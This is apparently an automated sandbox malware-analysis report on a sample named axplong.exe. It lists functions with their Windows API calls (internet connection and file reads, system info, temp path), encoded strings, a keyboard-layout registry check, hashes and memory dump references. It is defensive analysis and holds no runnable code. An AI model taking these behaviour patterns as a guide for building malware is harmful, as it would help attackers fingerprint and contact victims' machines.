Instruction Fuzzy Hash: 7C0124D338C211FDA393CD804B18AF63A6EE7963307304425B453DA612FE846A973A72

Function 04F600F2 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1560817c8fbe698632fbc334a2739af7a623e0b8fdb2ce80e90385862997c6f
Instruction ID: 33814d7a2d162b297aaf0913fe89ee441ea6b82a916435d2da37094c17d96622
Opcode Fuzzy Hash: f1560817c8fbe698632fbc334a2739af7a623e0b8fdb2ce80e90385862997c6f
Instruction Fuzzy Hash: 800126E738C111FE6243CD854B58AF7392EE7963303308415B407CA612FA84AA873971

Function 04F60203 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af5d9c5352d8d021216c28b8d63fb883e4a07620bf88145b7bd21c0d9165d8c
Instruction ID: 8e9ef57d84478bbe821bb65f387b735b142c24f63c26f2ffe43ffd7d4dde88df
Opcode Fuzzy Hash: 3af5d9c5352d8d021216c28b8d63fb883e4a07620bf88145b7bd21c0d9165d8c
Instruction Fuzzy Hash: 790126F764C6406FB207C5506A54ABA3B68EFC233037184BBE403D751AF9416C8BA530

Function 04F6013A Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 047f9ba3f9c6eabd73bc7c2c1b191b36788fcf0b90573a9393b321684bc7fbe4
Instruction ID: aeae8c85357211392047d763297accbe911bbc712ab1b31f76d0ae4628a3643e
Opcode Fuzzy Hash: 047f9ba3f9c6eabd73bc7c2c1b191b36788fcf0b90573a9393b321684bc7fbe4
Instruction Fuzzy Hash: 28F0F6E7258110BE6353CE951B449F76B6AEB973303308415F44798612FA945B473932

Function 04F6012F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eef4d9f988a6eeea8a807e9ed60c0b168ed57915094fa0d3e414984ad4ae900d
Instruction ID: eeffd5016f51eee303f7d6aabde55443d921a94c20e7dae49e37c6e45df2effd
Opcode Fuzzy Hash: eef4d9f988a6eeea8a807e9ed60c0b168ed57915094fa0d3e414984ad4ae900d
Instruction Fuzzy Hash: 7FF024EB24C110FE2343CE951B189F76A2EE7963303308025B413D9212FA906F873932

Function 04F60162 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b322d347cad84fb82ad8d74137ae6d3e8741c94167a6f4fe9b69a55bb191dd
Instruction ID: f786e953a8135bd4653a0a85d1a0fb178b2687a67bdea315521c4b79d9d667b6
Opcode Fuzzy Hash: a7b322d347cad84fb82ad8d74137ae6d3e8741c94167a6f4fe9b69a55bb191dd
Instruction Fuzzy Hash: 27F046A725C341AFA312D9A10A199BB7669EA83230370416EF003C6042F6811B4B7A32

Function 04F60197 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20bdef299c17c80aaee1d7d61a5ce97ae6e5c0e8ee012a2ef809eac7e984f71
Instruction ID: 081bfafa15cc20922eb00969b4a434ca4f5b048bb14947ac642eaeeb577abc35
Opcode Fuzzy Hash: e20bdef299c17c80aaee1d7d61a5ce97ae6e5c0e8ee012a2ef809eac7e984f71
Instruction Fuzzy Hash: 5AE086EB29D205BF7252D9916B159FB666DE6D33303308466F053D5101F9C41A473932

Function 04F601A6 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13b0299652663d32c2c5592d5f6caaa59762a3f1f64773152d0c8d6b61edb9f4
Instruction ID: 10e5efc2ed4a29a263add7bad1c0ba340d174e91195bfdee3fa1d88b3dcd0277
Opcode Fuzzy Hash: 13b0299652663d32c2c5592d5f6caaa59762a3f1f64773152d0c8d6b61edb9f4
Instruction Fuzzy Hash: C6E08CE7299215BE7252C9C16B049BA666DEA83730330C86AF013D5002F9C46A473931

Function 04F601D7 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8df2b89c154d58c065402209ab4d95a51631a1250c44025e79f171c7f02c404
Instruction ID: d8f12feeb9658d9ef5cc486d4069f9c24a6d2938722ab93da784c1b0e01cc936
Opcode Fuzzy Hash: e8df2b89c154d58c065402209ab4d95a51631a1250c44025e79f171c7f02c404
Instruction Fuzzy Hash: 18D017E72482087E221390942F18AF71A2CDAD273033080A9B807E7206E5850A067030

Analysis Process: axplong.exePID: 7036, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.9%
Total number of Nodes:	555
Total number of Limit Nodes:	28

Executed Functions

Function 0050BD60 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00558D70,00000000,00000000,00000000,00000000), ref: 0050BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0050BE10
HttpSendRequestA.WININET(?,00000000), ref: 0050BF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 0050BFCD
InternetCloseHandle.WININET(?), ref: 0050C0A7
InternetCloseHandle.WININET(?), ref: 0050C0AF
InternetCloseHandle.WININET(?), ref: 0050C0B7

Strings

stoi argument out of range, xrefs: 0050E3FA
RHYTYv==, xrefs: 0050BE33
RpKt, xrefs: 0050D516
d4V, xrefs: 0050E2FF
invalid stoi argument, xrefs: 0050E404
8KG0fCKZFzY=, xrefs: 0050C385
8KG0fymoFx==, xrefs: 0050C2EB, 0050C543

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$ConnectFileHttpOpenReadRequestSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4V$invalid stoi argument$stoi argument out of range
API String ID: 3632815558-96260405
Opcode ID: 5e0e2a5bb513cb87c9e3c11b10bb0f06994ff862a31e1e87ba0c9c1cf98e8b8f
Instruction ID: 6647464d0dc0e9a9a8d82d3aeb46a85257466f6528578a9e96112b2eacb4a100
Opcode Fuzzy Hash: 5e0e2a5bb513cb87c9e3c11b10bb0f06994ff862a31e1e87ba0c9c1cf98e8b8f
Instruction Fuzzy Hash: A6B1B2B16001199BEB24DF28CC89BAEBF79FF85304F5046A9E509972C2D7719AC0CF95

Function 005146C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

Strings

JB6, xrefs: 005153F5
9KN6, xrefs: 00515351
WJP6, xrefs: 005153A3
fed3aa, xrefs: 00515489
MJF+, xrefs: 005147BD, 005148EC, 00514ADC, 00514C0B
96B6, xrefs: 00515470
MJB+, xrefs: 00514776, 005147ED, 00514A95, 00514B0C
8ZF6, xrefs: 00515502
V0x6, xrefs: 0051541E
246122658369, xrefs: 00514F4D, 00514F8F, 00514F99, 005154F4
aZT6, xrefs: 005153CC
KFT0PL==, xrefs: 005154B9
stoi argument out of range, xrefs: 00514EAC
V0N6, xrefs: 0051537A
6F9fr==, xrefs: 00514712
aqB6, xrefs: 005154DB
Fz==, xrefs: 00514D2D
Vp 6, xrefs: 00515447
mP=, xrefs: 00516383, 00516652
-V, xrefs: 00514F3A
5F6, xrefs: 00515497
9526, xrefs: 0051531D

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectMtx_destroy_in_situOpen
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-V
API String ID: 1466736760-4265184053
Opcode ID: 0065747b909e5b2362eb49bbe05d6ccf698d82daa09d8ef283f848584fe2834a
Instruction ID: 159b8f0d54d17518c1adebb5404832ab84adecc97f4122cf19e67c913e4f7fc1
Opcode Fuzzy Hash: 0065747b909e5b2362eb49bbe05d6ccf698d82daa09d8ef283f848584fe2834a
Instruction Fuzzy Hash: 6F23E071A001589BFB19DB28CD897DDBE76AB85304F5482D8E049AB2C2EB359FC4CF51

Function 00505DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000422, xrefs: 00505FD9
0000043f, xrefs: 0050603B
00000423, xrefs: 0050600A
00000419, xrefs: 00505FA8
Keyboard Layout\Preload, xrefs: 00505F64

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 93839f50018d07e36004e48f9325e1735d18010f258861a9e4125bd7b58997d3
Instruction ID: af95bfb91550333958a5ae8432dd7683bd51bde59c9b6bcd95b25b05097f4210
Opcode Fuzzy Hash: 93839f50018d07e36004e48f9325e1735d18010f258861a9e4125bd7b58997d3
Instruction Fuzzy Hash: 74E17F71900219ABEB24DB94CC8DBDEBBB9BB44304F5041D9E409A7292DB74ABC5CF51

Function 00507D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00507EA3

Strings

JmpxQb==, xrefs: 005081B2
JmpxRL==, xrefs: 00508062
JmpyPb==, xrefs: 0050810A

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 854fe04d5905cc7a0b645a9b5b5924845a88e48cc9f24e0ba1c2bea35e47d083
Instruction ID: 251ce9f797118bdfd988a519b974425c455504dc9c975a08a7c12424a51f72df
Opcode Fuzzy Hash: 854fe04d5905cc7a0b645a9b5b5924845a88e48cc9f24e0ba1c2bea35e47d083
Instruction Fuzzy Hash: A2D1F770E00A09ABDF14BB28CD4E7AD7F71BB85320F944298E4156B3C2DB755E858BD2

Function 00536E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00536E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00536E7D
__dosmaperr.LIBCMT ref: 00536F12

Part of subcall function 00537177: __dosmaperr.LIBCMT ref: 005371AC

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: d091120f369144fd693f30d50b65bf60d8d44f21a5ad36dbfb7f919391d433e5
Instruction ID: 949a8ccba5ca8122d67f3ac626706b9219ec6e50cce97205a64e53692a446c44
Opcode Fuzzy Hash: d091120f369144fd693f30d50b65bf60d8d44f21a5ad36dbfb7f919391d433e5
Instruction Fuzzy Hash: D2414BB5900249BBDB24EFB5E8459AFBFF9FF88300B10852DF556D3210EA30A944CB61

Function 0053D4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hpGS, xrefs: 0053D4FB

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: hpGS
API String ID: 0-3330126124
Opcode ID: 1c2b323cb3bd37f3ac89f926fe6493569767ee8573ab5eb40f3f9e33a43aa62c
Instruction ID: 656a3a26c291881af68bedf3185840321238ddda98087a06bb1b789e6a752ea0
Opcode Fuzzy Hash: 1c2b323cb3bd37f3ac89f926fe6493569767ee8573ab5eb40f3f9e33a43aa62c
Instruction Fuzzy Hash: FE610372D002159BDF25AFA8F88A7EDBFB0FB95315F24411AE459AB290D6309D04CB71

Function 005082B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00508454

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 985d76bb82ebcaa91cbe59c9d40b099aad965e51baec30eac48e165bfb22a2c2
Instruction ID: e678fa418b6554c153989775436c42c05203060c95b73ec34d277dc36f17c166
Opcode Fuzzy Hash: 985d76bb82ebcaa91cbe59c9d40b099aad965e51baec30eac48e165bfb22a2c2
Instruction Fuzzy Hash: E5511B709002099BEF24EB68CD49BEDBF75BB45314F504698E845A72C2EF355E84CB91

Function 00508A60 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNELBASE(00000104,?,BFE8E80A,?,00000000), ref: 00508AA7

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 2909613e9c1b985785a5c19bbbc8ea55760d0960b16a6af1d0ab6b6db1c02b7f
Instruction ID: 8904324fea316ef98e2ce6ae30cd29ab153a5a0170d3ceb240425326bff530ac
Opcode Fuzzy Hash: 2909613e9c1b985785a5c19bbbc8ea55760d0960b16a6af1d0ab6b6db1c02b7f
Instruction Fuzzy Hash: 2051C0719011589BEB28DB28CC89BEDBB75FB85314F0081D9E449A72C2DB755F85CF90

Function 00536C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 068bc8ad39e7bd53c31911f9409bae99fbaee4289db30166bfc69707997480fa
Instruction ID: 8c770c1aa29d291844581583408f1a6f9788c6c620497a878ab41ea57288c11d
Opcode Fuzzy Hash: 068bc8ad39e7bd53c31911f9409bae99fbaee4289db30166bfc69707997480fa
Instruction Fuzzy Hash: E5210A72A012097BEF217B649C46B9F3F69BF81338F608714F9247B1D1DB706E0596A2

Function 00536F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00536FB3

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
